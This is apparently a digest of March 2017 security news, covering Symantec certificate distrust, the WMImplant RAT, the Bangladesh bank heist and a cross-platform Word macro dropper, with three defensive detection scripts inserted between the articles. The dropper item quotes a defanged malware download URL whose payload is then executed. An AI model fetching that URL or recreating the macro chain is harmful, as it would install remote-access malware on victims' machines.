If the hackers do not receive the requested sum by April 7, 2017, they threaten to delete millions of user accounts. They would allegedly also delete files directly on the devices of Apple's customers.

Apple does not reward cybercriminals

The Motherboard website obtained part of the alleged email communication between a member of the hacker group and Apple. According to it, a member of the security team first requested a sample of the leaked data.

In the second message, the employee states that the company does not reward cybercriminals for breaking the law. Finally, he adds that the entire communication has been archived and will be forwarded to law enforcement.

Whether the threat is real or merely a way for the hackers to enrich themselves, the most effective protection is changing your password and enabling two-step login.


AppleInsider later published Apple's statement. The company said that its systems had not been compromised by any cyberattack. The credentials held by the cybercriminals were supposedly obtained from breached third-party services.

The company added that as part of its security measures it monitors and, if necessary, blocks all attempts at unauthorized access to other people's accounts.


Third-Party App Store Slips Inside iOS App Store

24.3.2017 securityweek iOS
A third-party app store application managed to slip into the official iOS App Store by masquerading as a legitimate financial helper application, according to Trend Micro researchers.

Dubbed “Household Accounts App” and claiming to be a financial helper app for families, the application is designed with Japanese characters, but the app store it leads to is written in Mandarin Chinese. The researchers discovered the program in the App Store of multiple countries and couldn’t determine exactly who it targets.

When launched for the first time, the application checks for the PPAASSWOpenKey key in the system’s user preferences plist; the key does not exist until the app has run once, which is how it determines whether it has run before, the researchers explain. On a first run the app takes the else branch, which requests the right to use data to access the third-party store, but the user has to approve the request.

The third-party store can be used to install not only applications in the official iOS App Store, but also those that are distributed via unofficial channels, thus potentially exposing users to mobile malware and other unwanted applications. One of the programs distributed via this portal is “PG Client,” a tool for jailbreaking iOS devices.

In addition to this third-party store, the security researchers found a program designed to promote applications already in the App Store. Dubbed “LoveApp”, the software could bypass Apple’s arrangement of apps in searches and the paid Search Ads option and could create revenue by charging developers looking to promote apps without using Apple’s promotion service.

LoveApp was found to abuse iOS APIs that allow developers to display their app’s page, but used them to direct users from its own listing to the App Store listing of the promoted apps. The app also has a series of privacy issues, because it was found to upload some user attributes to its servers at installation, including the advertising identifier (IDFA), which is used to count the number of downloads.

The app also uses a third-party SDK called TalkingData to gather information about the user’s behavior. The SDK has many aggressive API calls and can acquire various information about the user’s system, such as the Wi-Fi network name, running processes, and IP address. On jailbroken devices, it can also gather the user’s Apple ID and installed apps.

“We recommend that users be careful about downloading apps from third-party app stores. Apple can’t endorse the safety of any of the apps delivered via third-party stores, and such is the case here: users are still exposing themselves to various security threats (including malware and other unwanted apps). Organizations should put in place policies to reduce the risk from these malicious apps, such as blocking unapproved app stores and safeguarding personal devices,” Trend Micro notes.


Apple: CIA's Mac, iPhone Vulnerabilities Already Patched

24.3.2017 securityweek Apple
Apple Tells WikiLeaks to Submit CIA Exploits Through Normal Process

Apple’s initial analysis of the iPhone and Mac exploits disclosed by WikiLeaks on Thursday shows that the vulnerabilities they use have already been patched. The company told WikiLeaks to send the information it possesses through the regular submission process.

WikiLeaks’ second “Vault 7” dump, dubbed by the organization “Dark Matter,” includes documents describing tools allegedly used by the U.S. Central Intelligence Agency (CIA) to spy on iPhones and Mac computers. However, installing the implants requires physical access to the targeted device.

The documents are dated 2008, 2009 and 2012, but WikiLeaks claims it has information that the CIA has continued to work on these tools. Apple has conducted a preliminary assessment of the latest WikiLeaks disclosure and determined that the vulnerabilities described in the documents were patched years ago.

“Based on our initial analysis, the alleged iPhone vulnerability affected iPhone 3G only and was fixed in 2009 when iPhone 3GS was released. Additionally, our preliminary assessment shows the alleged Mac vulnerabilities were previously fixed in all Macs launched after 2013,” Apple told SecurityWeek.

WikiLeaks (@wikileaks) responded on Twitter on 24 March 2017: "Apple's claim that it has "fixed" all "vulnerabilities" described in DARKMATTER is duplicitous. EFI is a systemic problem, not a zero-day."

Apple’s analysis of the first Vault 7 leak also showed that many of the disclosed iOS exploits had already been patched in the latest version of the mobile operating system.

The tools described in the Dark Matter leak include Sonic Screwdriver, which is designed to allow code execution on a Mac laptop with password-protected firmware via an exploit stored on a Thunderbolt-to-Ethernet adapter.

The DarkSeaSkies implant is designed for targeting the EFI on MacBook Air computers, while NightSkies can be used to steal data from iPhones.

The documents show that the exploits can be delivered either via a supply chain intercept or by giving the manipulated device to the target as a gift. However, some believe the claims made by WikiLeaks regarding supply chain interception are misleading.

Apple has not negotiated with WikiLeaks

WikiLeaks has not made public any of the actual exploits, but it has promised to share them with affected tech companies. However, the whistleblower organization wants these companies to meet certain conditions, including to promise to patch the vulnerabilities within 90 days.

While Mozilla has accepted WikiLeaks’ offer, it appears Google, Apple and other companies are not eager to cooperate, which WikiLeaks has blamed on “conflicts of interest due to their classified work for U.S. government agencies.” Apple said it had not negotiated with WikiLeaks for any information.

“We have given them instructions to submit any information they wish through our normal process under our standard terms,” Apple said in its statement. “Thus far, we have not received any information from them that isn’t in the public domain. We are tireless defenders of our users' security and privacy, but we do not condone theft or coordinate with those that threaten to harm our users.”


Android Forums Suffers Data Breach

24.3.2017 securityweek Android
Android Forums, one of the most popular online Android communities, informed members this week that the server hosting its website has been breached, allowing attackers to access some user information.

According to representatives of Neverstill Media, which maintains Android Forums, hackers only managed to access information on 2.5 percent of active users. The compromised data includes email addresses, hashed passwords and salts.

Neverstill said usernames and financial data were not accessed. The company also noted that the breach only affected one staff member and only 40 users who registered accounts in 2016 and 2017. More than half of the compromised accounts had never posted anything on Android Forums, leading developers to believe they may have been bots.

Affected users have been notified via email and instructed to change their passwords. The passwords of impacted accounts that had not been active were automatically randomized.

The accessed information can be leveraged for spam and phishing campaigns, and users have been advised to be cautious.

“This could be someone who is upset with us who hopes to use the information against staff. They could blackmail us and threaten to publish the information publicly,” Android Forums told users.

The vulnerability exploited by the attackers has been patched and various security improvements are being made to prevent incidents in the future.

This is not the first time Android Forums has suffered a data breach. A similar incident took place in 2012, when more than one million users, including staff, had their details exposed. At the time, attackers accessed usernames, email addresses, hashed and salted passwords, IPs, and other data.

It’s unclear why usernames have not been stolen in the latest breach, but Android Forums has some theories.

“Perhaps just in case a null entry was to be found/flagged. Perhaps they were bound by the limitations of the vector they used. Perhaps they were practicing on us,” users were told. “Or, they could be comparing hashes against the previous set to see what has or has not changed.”


Google Stops Trusting Symantec-Issued Certificates

24.3.2017 securityweek Safety
Google is displeased with the fact that Symantec has failed to ensure that its partners don’t improperly issue digital certificates, which is why the tech giant has announced its intent to gradually stop trusting all of the company’s existing certificates in Chrome.

Symantec, and particularly some of its subsidiaries and WebTrust audited partners, have been caught by Google and others wrongly issuing certificates. In 2015, Google told Symantec to step up its game after a subsidiary certificate authority (CA) issued unauthorized google.com certificates.

More recently, Symantec’s GeoTrust and Thawte were found to have wrongly issued more than 100 certificates, including for domains such as test.com and example.com.

According to Google software engineer Ryan Sleevi, an investigation revealed that Symantec’s partners misissued at least 30,000 certificates in the past years. These certificates were issued by four organizations: CrossCert (Korea Electronic Certificate Authority), Certisign Certificatadora Digital, Certsuperior S. de R. L. de C.V., and Certisur S.A.

Symantec has authorized these companies to perform validation for certificate information, but failed to properly audit them, and according to the Baseline Requirements, the cybersecurity giant is liable for any issues. Another problem is that there is no way to distinguish certificates validated by Symantec from certificates validated by the company’s partners, Sleevi said.

“Despite having knowledge of these issues, Symantec has repeatedly failed to proactively disclose them. Further, even after issues have become public, Symantec failed to provide the information that the community required to assess the significance of these issues until they had been specifically questioned,” Sleevi explained. “The proposed remediation steps offered by Symantec have involved relying on known-problematic information or using practices insufficient to provide the level of assurance required under the Baseline Requirements and expected by the Chrome Root CA Policy.”

As a result of Symantec’s failings, Google wants to remove the recognition of Extended Validation status for certificates issued by the company, and reduce the accepted validity period for newly issued certificates to nine months or less. Under the current proposal, all existing certificates will gradually become untrusted.

Since Symantec-issued certificates account for a significant percentage of the total, Google wants the certificates to be replaced gradually in order to avoid disruptions for websites and their visitors.

Starting with Chrome 59, the maximum age of Symantec-issued certificates will be decreased to 33 months and by Chrome 64 it will be reduced to 9 months.

Symantec said it strongly objects to Google’s decision, and called the action unexpected and the announcement irresponsible. The company said it hopes Google did not intend to create uncertainty and doubt within the community about its SSL/TLS certificates. Symantec's statement reads:

Google’s statements about our issuance practices and the scope of our past mis-issuances are exaggerated and misleading. For example, Google’s claim that we have mis-issued 30,000 SSL/TLS certificates is not true. In the event Google is referring to, 127 certificates – not 30,000 – were identified as mis-issued, and they resulted in no consumer harm. We have taken extensive remediation measures to correct this situation, immediately terminated the involved partner’s appointment as a registration authority (RA), and in a move to strengthen the trust of Symantec-issued SSL/TLS certificates, announced the discontinuation of our RA program. This control enhancement is an important move that other public certificate authorities (CAs) have not yet followed.

While all major CAs have experienced SSL/TLS certificate mis-issuance events, Google has singled out the Symantec Certificate Authority in its proposal even though the mis-issuance event identified in Google’s blog post involved several CAs.

We operate our CA in accordance with industry standards. We maintain extensive controls over our SSL/TLS certificate issuance processes and we work to continually strengthen our CA practices. We have substantially invested in, and remain committed to, the security of the Internet. Symantec has publicly and strongly committed to Certificate Transparency (CT) logging for Symantec certificates and is one of the few CAs that hosts its own CT servers. Symantec has also been a champion of Certification Authority Authorization (CAA), and has asked the CA/Browser Forum for a rule change to require that all certificate authorities explicitly support CAA. Our most recent contribution to the CA ecosystem includes the creation of Encryption Everywhere, our freemium program, to create widespread adoption of encrypted websites.

We want to reassure our customers and all consumers that they can continue to trust Symantec SSL/TLS certificates. Symantec will vigorously defend the safe and productive use of the Internet, including minimizing any potential disruption caused by the proposal in Google’s blog post.

We are open to discussing the matter with Google in an effort to resolve the situation in the shared interests of our joint customers and partners.


Windows Zero-Day Exploited by AdGholas, Neutrino EK

24.3.2017 securityweek Exploit

One of the Windows zero-day vulnerabilities patched by Microsoft this month has been exploited by cybercriminals since last summer, Trend Micro said on Friday.

Microsoft fixed many vulnerabilities with the March 2017 Patch Tuesday updates, including three flaws that had been exploited in the wild before patches were made available.

One of the flaws, tracked as CVE-2017-0022, has been described as an XML Core Services information disclosure vulnerability that can be exploited through Internet Explorer by getting the targeted user to click on a specially crafted link.

“An information vulnerability exists when Microsoft XML Core Services (MSXML) improperly handles objects in memory. Successful exploitation of the vulnerability could allow the attacker to test for the presence of files on disk,” Microsoft said in its advisory.

The security hole was spotted by researchers at Trend Micro, which reported it to Microsoft in September, and Proofpoint.

According to Trend Micro, the zero-day flaw has been used in the AdGholas malvertising campaign since July 2016, and it was added to the Neutrino exploit kit in September 2016. Experts believe CVE-2017-0022 replaced CVE-2016-3298 and CVE-2016-3351, which had also been used by AdGholas and another actor in malvertising operations before patches were made available.

Experts revealed a few months ago that CVE-2016-3298 and CVE-2016-3351 had been leveraged by the cybercriminals to avoid researchers. CVE-2017-0022 was apparently used for similar purposes.

“Successful exploitation of this vulnerability could allow a cybercriminal access to information on the files found in the user’s system,” explained Trend Micro threat analysts Brooks Li and Henry Li. “In particular, the attacker would be able to detect if the system is using specific security solutions – especially ones that analyze malware.”

Trend Micro has made available a technical analysis of the vulnerability and Microsoft’s patch. The company has also provided a brief explanation of how CVE-2017-0022 is exploited in a malvertising campaign involving the Neutrino exploit kit:

Malvertising campaign exploiting CVE-2017-0022 (diagram from Trend Micro)


Researcher Builds WMI-Based Hacking Tool in PowerShell

24.3.2017 securityweek Hacking
Researcher Builds WMI-Based RAT in PowerShell

Security researcher Christopher Truncer released a WMI-based agentless post-exploitation RAT that he developed in PowerShell.

Last year, Truncer released a PowerShell script capable of carrying out different actions via Windows Management Instrumentation (WMI), both on the local and on remote machines. Dubbed WMImplant, the newly released Remote Access Tool (RAT) builds on that script, says Truncer, who is a security researcher and Red Teamer at Mandiant.

“WMImplant leverages WMI for the command and control channel, the means for executing actions (gathering data, issuing commands, etc.) on the targeted system, and data storage. It is designed to run both interactively and non-interactively. When using WMImplant interactively, it’s designed to have a menu of commands reminiscent of Meterpreter,” Truncer reveals.

Some of the commands supported by the new tool include reading file contents and downloading files from the remote machine, listing the files and folders in a specific directory, searching for a file on a user-specified drive, and uploading a file to the remote machine. It can also be used to list processes and start or kill a specific process.

Additionally, the tool can be used for lateral movement, offering support for running command line commands and getting the output, adding, modifying or removing registry values, enabling or disabling WinRM on the targeted host, running a PowerShell script on a system and receiving output, manipulating scheduled jobs, and creating, modifying, or deleting services.

WMImplant also offers support for data gathering operations (including information on users, targeted system, local and network drives, IP addresses, and installed programs), for logging off users, and for shutting down or restarting targeted systems. It can also be used to determine whether a user is away from the machine and to identify users who have logged into the system.

The security researcher explains that WMImplant uses WMI itself for data storage, and does so by leveraging existing WMI properties. Specifically, it uses the DebugFilePath property, which the researcher discovered could store more than 250 megabytes of data. WMImplant’s command and control communications methodology is also shaped by this, the researcher says.
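A defender-side check for the storage trick just described, added here and not part of WMImplant or the article: it assumes the DebugFilePath property in question is the one on the Win32_OSRecoveryConfiguration WMI class, whose normal value is a short crash-dump path such as %SystemRoot%\MEMORY.DMP, and it flags hosts where the value is too long or does not look like such a path.

```powershell
# Added example (not WMImplant's own code): flag a DebugFilePath value that does not look
# like a crash-dump path. Assumption: the property the article refers to lives on the
# Win32_OSRecoveryConfiguration class, where it normally reads "%SystemRoot%\MEMORY.DMP".

function Test-DebugFilePathAbuse {
    [CmdletBinding()]
    param(
        # Hosts to inspect; an empty list means the local machine only.
        [string[]]$ComputerName = @(),
        # A genuine file path never exceeds MAX_PATH (260 characters).
        [int]$MaxLength = 260
    )

    $targets = if ($ComputerName.Count -gt 0) { $ComputerName } else { @($null) }

    foreach ($target in $targets) {
        $cimArgs = @{ ClassName = 'Win32_OSRecoveryConfiguration'; ErrorAction = 'Stop' }
        if ($target) { $cimArgs.ComputerName = $target }   # remote query goes over WinRM

        $cfg   = Get-CimInstance @cimArgs
        $value = [string]$cfg.DebugFilePath

        # A legitimate value is short, printable ASCII and ends in .dmp. Data parked in the
        # property by a tool is long and usually not a path at all, so either test is a lead.
        $tooLong     = $value.Length -gt $MaxLength
        $notDumpPath = $value -notmatch '^[\x20-\x7E]*\.dmp$'   # -notmatch ignores case

        [pscustomobject]@{
            ComputerName = if ($target) { $target } else { $env:COMPUTERNAME }
            Length       = $value.Length
            Preview      = $value.Substring(0, [Math]::Min(60, $value.Length))
            Suspicious   = ($tooLong -or $notDumpPath)
        }
    }
}

# Usage: inspect the local host plus two constructed server names and keep only the hits.
# Test-DebugFilePathAbuse -ComputerName 'srv01', 'srv02' | Where-Object Suspicious
```

Treat a Suspicious result as a lead to investigate rather than proof of compromise, since an unusual but legitimate dump path also trips the check. Once a hit is confirmed, the same instance can be reset to its default path with Set-CimInstance after the stored data has been preserved for forensics.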

The RAT was designed for both interactive and non-interactive use, but the researcher says that the easiest way to use WMImplant is interactively, although that is not always possible. Unlike RATs such as Meterpreter or Cobalt Strike’s Beacon, which can load and execute PowerShell scripts, but require non-interactive use only, WMImplant has a built-in command-line generating feature that changes that.


Google Chrome to Distrust Symantec SSLs for Mis-issuing 30,000 EV Certificates
24.3.2017 thehackernews Safety
Google announced its plans to punish Symantec by gradually distrusting its SSL certificates after the company was caught improperly issuing 30,000 Extended Validation (EV) certificates over the past few years.
The Extended Validation (EV) status of all certificates issued by Symantec-owned certificate authorities will no longer be recognized by the Chrome browser for at least a year until Symantec fixes its certificate issuance processes so that it can be trusted again.
Extended Validation certificates are supposed to provide the highest level of trust and authentication: before issuing one, a Certificate Authority must verify the requesting entity's legal existence and identity.
The move came into effect immediately after Ryan Sleevi, a software engineer on the Google Chrome team, made this announcement on Thursday in an online forum.
"This is also coupled with a series of failures following the previous set of misissued certificates from Symantec, causing us to no longer have confidence in the certificate issuance policies and practices of Symantec over the past several years," says Sleevi.
One of the important parts of the SSL ecosystem is trust, but if CAs do not properly verify legal existence and identity before issuing EV certificates for domains, the credibility of those certificates is compromised.
The Google Chrome team started its investigation on January 19 and found that the certificate issuance policies and practices of Symantec over the past several years were not trustworthy, which could threaten the integrity of the TLS system used to authenticate and secure data and connections over the Internet.
Under this move, the Google Chrome team has proposed the following steps as punishment:
1. EV certificates issued by Symantec until today will be downgraded to less-secure domain-validated certs, which means the Chrome browser will immediately stop displaying the name of the validated domain name holder in the address bar for a period of at least a year.
2. To limit the risk of any further misissuance, all newly-issued certificates must have validity periods of no greater than nine months (effective from Chrome 61 release) to be trusted in Google Chrome.
3. Google proposes an incremental distrust, by gradually reducing the "maximum age" of Symantec certificates over the course of several Chrome releases, requiring them to be reissued and revalidated.
Chrome 59 (Dev, Beta, Stable): 33 months validity (1023 days)
Chrome 60 (Dev, Beta, Stable): 27 months validity (837 days)
Chrome 61 (Dev, Beta, Stable): 21 months validity (651 days)
Chrome 62 (Dev, Beta, Stable): 15 months validity (465 days)
Chrome 63 (Dev, Beta): 9 months validity (279 days)
Chrome 63 (Stable): 15 months validity (465 days)
Chrome 64 (Dev, Beta, Stable): 9 months validity (279 days)
This means, starting with Chrome 64, which is expected to come out in early 2018, the Chrome browser will only trust Symantec certificates issued for nine months (279 days) or less.
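A small model of the schedule above, added here as an example (not code from Google or from the article): it encodes the per-release validity caps listed in the text, reports whether a Symantec-issued certificate with a given notBefore/notAfter would still be trusted by a given Chrome release and channel, and finds the first release that would distrust it. The sample certificate dates are constructed; releases after 64 are assumed to keep the nine-month cap.

```python
from datetime import date

# Longest validity period (in days) of a Symantec-issued certificate that each
# Chrome release still trusts, taken from the schedule in the article.  Chrome 63
# is the only release where the channels differ: Dev/Beta already drop to 279
# days while Stable stays at 465 days.
SCHEDULE = {
    59: {"dev": 1023, "beta": 1023, "stable": 1023},
    60: {"dev": 837, "beta": 837, "stable": 837},
    61: {"dev": 651, "beta": 651, "stable": 651},
    62: {"dev": 465, "beta": 465, "stable": 465},
    63: {"dev": 279, "beta": 279, "stable": 465},
    64: {"dev": 279, "beta": 279, "stable": 279},
}
FINAL_MAX_DAYS = 279  # nine months: Chrome 64 and (assumed) every later release
CHANNELS = ("dev", "beta", "stable")


def _as_date(value):
    """Accept a date or an ISO 8601 string such as '2017-03-01'."""
    return value if isinstance(value, date) else date.fromisoformat(value)


def max_validity_days(version, channel="stable"):
    """Validity cap applied by a Chrome release, or None for releases before 59
    (the schedule starts with Chrome 59, so earlier releases apply no cap)."""
    channel = channel.lower()
    if channel not in CHANNELS:
        raise ValueError(f"unknown channel: {channel}")
    if version < 59:
        return None
    if version in SCHEDULE:
        return SCHEDULE[version][channel]
    return FINAL_MAX_DAYS


def validity_days(not_before, not_after):
    """Length of the certificate's validity period in whole days."""
    not_before, not_after = _as_date(not_before), _as_date(not_after)
    if not_after <= not_before:
        raise ValueError("notAfter must be later than notBefore")
    return (not_after - not_before).days


def check_certificate(not_before, not_after, version, channel="stable"):
    """Decide how one Chrome release treats a Symantec-issued certificate.

    The EV indicator is reported separately because step 1 of the plan
    withdraws EV recognition regardless of the certificate's validity period.
    """
    days = validity_days(not_before, not_after)
    cap = max_validity_days(version, channel)
    trusted = cap is None or days <= cap
    return {
        "validity_days": days,
        "max_allowed_days": cap,
        "trusted": trusted,
        "ev_indicator_shown": False,  # EV status not recognised for at least a year
    }


def first_distrusting_release(not_before, not_after, channel="stable"):
    """First release in the 59..64 schedule whose cap the certificate exceeds,
    or None if it stays trusted through the whole schedule (i.e. it is already
    within the nine-month limit and needs no reissuance)."""
    days = validity_days(not_before, not_after)
    for version in sorted(SCHEDULE):
        if days > max_validity_days(version, channel):
            return version
    return None


if __name__ == "__main__":
    # Constructed sample: a one-year certificate issued in March 2017.
    nb, na = "2017-03-01", "2018-03-01"
    for v in (59, 62, 63, 64):
        print(v, check_certificate(nb, na, v, "stable"))
    print("first distrusting stable release:", first_distrusting_release(nb, na))
```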
Google believes this move will ensure that web developers are aware of the risk of future distrust of Symantec-issued certs, should additional misissuance events occur, while also giving them "the flexibility to continue using such certificates should it be necessary."


US Senate Just Voted to Let ISPs Sell Your Web Browsing Data Without Permission
24.3.2017 thehackernews BigBrothers
ISPs can now sell certain sensitive data like your browsing history without permission, thanks to the US Senate.
The US Senate on Wednesday voted, with 50 Republicans for it and 48 Democrats against, to roll back a set of broadband privacy regulations passed by the Federal Communication Commission (FCC) last year when it was under Democratic leadership.
In October, the Federal Communications Commission ruled that ISPs would need to get consumers' explicit consent before being allowed to sell their web browsing data to the advertisers or other big data companies.
Before the new rules could take effect on March 2, President Trump's newly appointed FCC chairman Ajit Pai temporarily put a hold on them.
Ajit Pai argued that the rules, which are regulated by the FTC, unfairly favored companies like Google, Twitter, and Facebook, which have the ability to collect more data than ISPs and thus dominate digital advertising.
"All actors in the online space should be subject to the same rules, and the federal government shouldn’t favor one set of companies over another," FCC said in a statement.
"Therefore, he has advocated returning to a technology-neutral privacy framework for the online world and harmonizing the FCC’s privacy rules for broadband providers with the FTC’s standards for others in the digital economy."
Pai wanted the FCC and the FTC to treat all online entities the same way, so the new privacy rules should be scrapped.
If the latest decision gets approval from the House of Representatives and is signed by President Trump, it will make it easier for ISPs like Verizon, Comcast, and AT&T to earn more money by collecting and selling data on what you buy, where you browse, and what you search for from your home, all without your consent.
Since the Senate used the Congressional Review Act (CRA) to overturn the privacy rules, if the repeal is passed, it would not only roll back the FCC's privacy rules but also prevent the regulatory body from making similar privacy regulations in the future if the.
Not surprisingly, the broadband industry applauded the FCC's move, calling it "a welcome recognition that consumers benefit most when privacy protections are consistently applied throughout the Internet ecosystem."
But, of course, privacy advocates are not at all happy with the vote, arguing that the Senate has put ISPs’ profits over users’ privacy.


US blames North Korea for the $81 million Bangladesh cyber heist
24.3.2017 securityaffairs BigBrothers

US federal prosecutors suspect the involvement of North Korea in the cyber heist of $81 million from Bangladesh’s account at the New York Federal Reserve Bank.
The news was reported by The Wall Street Journal; prosecutors suspect the involvement of Chinese middlemen who helped the government in Pyongyang organize the cyber theft.

In February 2016, unknown hackers transferred the funds from Bangladesh’s account at the New York Federal Reserve Bank to accounts in the Philippines through the SWIFT system.

In reality, the hackers attempted to steal much more: they tried to complete dozens of transfers for an overall amount of $850 million.

The disaster was avoided by chance: the bank’s security systems and typos in some requests allowed the theft attempts to be identified, and investigators discovered that 35 transfer attempts by the hackers had failed.

“$81 million was transferred from the Federal Reserve Bank to Filipino accounts while attempts to claim $850 million were foiled by the Federal Reserve Bank’s security system,” Razee Hassan, deputy governor of Bangladesh Bank, told AFP.

“Attempts to transfer money to Sri Lanka by the hackers were foiled as their transfer requests contained typos,” he added.

The hackers exploited gaps in communication between banks at weekends: the operation started on a Friday, when Bangladesh Bank is closed, and on the following Saturday and Sunday the Fed in New York was closed.


The choice of the Philippines as the destination country for the bank transfers was not accidental: banks there were also closed on the Monday for the Chinese New Year.

A top police investigator in Dhaka told Reuters in December that some Bangladesh Bank officials deliberately exposed its computer systems allowing hackers to penetrate the systems.

The Justice Department and the New York Fed declined to comment on the report.

The suspicion that North Korea is behind the cyber heist is not new.

“The U.S. Federal Bureau of Investigation believes that North Korea is responsible for the heist, an official briefed on the probe told Reuters. Richard Ledgett, deputy director of the U.S. National Security Agency, publicly suggested on Tuesday that North Korea may be linked to the incident, while private firms have long pointed the finger at the reclusive state.” reported the Reuters Agency.

Security experts at Symantec linked the attacks against banks worldwide to the Lazarus APT group which is believed to be a nation state actor.

In June 2016, evidence collected by a senior security researcher from Anomali Labs linked the malware to the North Korean hacker crew known as Lazarus Group.

The expert discovered five additional strains of malware that suggested the involvement of the Lazarus Group in the cyber attacks that targeted the banks.

The researchers at Symantec discovered that the hacking tools used by the gang share many similarities with the malicious code in the arsenal of the Lazarus APT.

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

“Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam.” reads the analysis published by Symantec last year.

The experts at Symantec have spotted at least three strains of malware, Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee, which have been used in targeted attacks against financial institutions.

“Symantec has identified three pieces of malware which were being used in limited targeted attacks against the financial industry in South-East Asia: Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee.” states Symantec. “At first, it was unclear what the motivation behind these attacks were, however code sharing between Trojan.Banswift (used in the Bangladesh attack used to manipulate SWIFT transactions) and early variants of Backdoor.Contopee provided a connection.”

The expert Aaron Shelmire from Anomali Labs supported this thesis with his investigation.

“Five new additional pieces of malware code discovered that contain unique portions of code related to the SWIFT attacks. ” wrote Shelmire.

The Anomali Labs team conducted deeper research into a very large malware data repository, using a set of Yara signatures to search for the shared subroutines.


The experts discovered five additional pieces of malware containing portions of code shared by Lazarus Group’s strains of malware, including the one used in the several SWIFT attacks, according to Shelmire.

Last week, SWIFT announced that it planned to cut off the remaining North Korean banks still connected to its system, amid concerns about the North Korean nuclear program and the missile tests conducted by Pyongyang.

The U.S. Treasury is considering sanctions against the alleged Chinese middlemen who facilitated the cyber heist.

The New York Fed and SWIFT declined to comment.


Fortinet researchers spotted a malware that infects both Microsoft and Apple OSs
24.3.2017 securityaffairs Apple

Malware researchers at Fortinet have discovered a weaponized Word document that is able to start the infection process on both Microsoft and Apple OSs.
Security researchers at Fortinet have spotted a weaponized Word document designed to spread malware on either Microsoft Windows or Mac OS X: it determines which OS the person opening the document is using and starts the corresponding attack.

The document tricks victims into enabling macros, after which malicious VBA code is executed.

Once the VBA code is executed, the AutoOpen() function is automatically invoked. It first reads the data from the “Comments” property of the Word file, a base64-encoded string, and, depending on the OS, executes the corresponding script.

When executed on Mac OS X, the script downloads a malicious file containing another script, written in Python, which is executed and communicates with the control server.

“When the python script is executed, it downloads a file from “hxxps://sushi.vvlxpress.com:443/HA1QE”, and executes it. The downloaded python script is a slightly modified version of the Python meterpreter file, which is also part of the Metasploit framework.” reads the analysis published by Fortinet. “The source code of the project can be downloaded from the following URL: hxxps://github.com/rapid7/metasploit-payloads/blob/master/python/meterpreter/meterpreter.py.”

The above script is a version of the Python Meterpreter file that leverages an in-memory DLL injection mechanism.

A similar technique was implemented by the criminal gang tracked as GCMAN and by a group of criminals behind a hacking campaign that leveraged fileless malware in February.

The script used to start the attack on Windows systems is much more sophisticated. It implements a “matryoshka” mechanism of nested PowerShell scripts and, according to the researchers, only works on 64-bit versions of Windows.

Each layer is base64-encoded; once the final level is executed, the script downloads a 64-bit DLL file, which runs and communicates with the control server.
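A defender-side check for the document-property trick described above, added here as an example and not Fortinet's code: it inspects an OOXML Word package (a zip) for an embedded VBA project and for a base64 blob in the “Comments” property, which OOXML stores as dc:description in docProps/core.xml. The sample document is constructed in memory, its "encoded script" is a harmless placeholder string, and the minimum blob length is an assumed threshold.

```python
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

CORE_PROPS = "docProps/core.xml"
VBA_PROJECT = "word/vbaProject.bin"  # present only in macro-enabled packages
DC_DESCRIPTION = "{http://purl.org/dc/elements/1.1/}description"  # Word's "Comments" field
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MIN_BLOB_CHARS = 64  # assumption: shorter base64-looking strings are ignored as noise


def _namelist(docx_bytes):
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        return set(zf.namelist())


def comments_property(docx_bytes):
    """Return the text of the Comments (dc:description) core property, or None."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if CORE_PROPS not in zf.namelist():
            return None
        root = ET.fromstring(zf.read(CORE_PROPS))
    node = root.find(DC_DESCRIPTION)
    return node.text if node is not None else None


def has_vba_project(docx_bytes):
    return VBA_PROJECT in _namelist(docx_bytes)


def decode_if_base64(text):
    """Decode a base64 blob stored in a metadata field; None if it is not one."""
    compact = re.sub(r"\s+", "", text or "")
    if len(compact) < MIN_BLOB_CHARS or not BASE64_RE.match(compact):
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except ValueError:  # binascii.Error (bad alphabet or padding) is a ValueError
        return None


def assess(docx_bytes):
    """Combine both indicators: a macro plus an encoded Comments blob is the
    pattern the dropper described above relies on."""
    macros = has_vba_project(docx_bytes)
    blob = decode_if_base64(comments_property(docx_bytes))
    findings = []
    if macros:
        findings.append("macro-enabled: word/vbaProject.bin present")
    if blob is not None:
        findings.append(f"Comments property holds a base64 blob ({len(blob)} bytes decoded)")
    return {
        "macros": macros,
        "encoded_comment": blob is not None,
        "decoded_length": 0 if blob is None else len(blob),
        "suspicious": macros and blob is not None,
        "findings": findings,
    }


def build_sample_docx(comment, with_macros):
    """Construct a minimal docx-shaped package for testing (not a real Word file)."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        "<cp:coreProperties "
        'xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
        'xmlns:dc="http://purl.org/dc/elements/1.1/">'
        f"<dc:title>sample</dc:title><dc:description>{comment}</dc:description>"
        "</cp:coreProperties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr(CORE_PROPS, core)
        zf.writestr("word/document.xml", "<document/>")
        if with_macros:
            zf.writestr(VBA_PROJECT, b"\x00constructed placeholder, not real VBA\x00")
    return buf.getvalue()


# Constructed stand-in for the encoded script; nothing here is ever executed.
SAMPLE_SCRIPT = b"constructed placeholder standing in for the OS-specific dropper script " * 2
SAMPLE_COMMENT = base64.b64encode(SAMPLE_SCRIPT).decode("ascii")

if __name__ == "__main__":
    for label, doc in (
        ("macro + encoded comment", build_sample_docx(SAMPLE_COMMENT, True)),
        ("macro, plain comment", build_sample_docx("Reviewed by finance", True)),
    ):
        print(label, "->", assess(doc))
```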


The malware researchers at Fortinet are still analyzing the malicious code.


QNAP QTS Domain Privilege Escalation Vulnerability
24.3.2017 securityaffairs Vulnerebility

The vulnerability allows any local user, such as “httpdusr”, which is used to run the web application, to escalate to Domain Administrator if the NAS is a domain member.
